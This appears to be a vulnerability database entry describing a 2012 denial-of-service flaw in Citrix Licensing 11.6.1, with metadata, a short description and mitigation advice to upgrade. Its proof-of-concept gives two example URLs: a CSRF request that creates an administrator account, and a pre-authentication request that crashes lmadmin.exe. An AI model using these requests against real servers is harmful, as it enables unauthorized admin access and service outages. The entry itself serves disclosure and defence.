vendor:
Licensing
by:
SecurityFocus
4,3
CVSS
MEDIUM
Denial-of-Service
400
CWE
Product Name: Licensing
Affected Version From: 11.6.1 build 10007
Affected Version To: 11.6.1 build 10007
Patch Exists: Yes
Related CWE: N/A
CPE: a:citrix:licensing
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012
Citrix Licensing Denial-of-Service Vulnerability
Citrix Licensing is prone to a denial-of-service vulnerability. A remote attacker can leverage this issue to crash the affected application, denying service to legitimate users. Proof-of-Concept: http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF) http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe)
Mitigation:
Upgrade to the latest version of Citrix Licensing.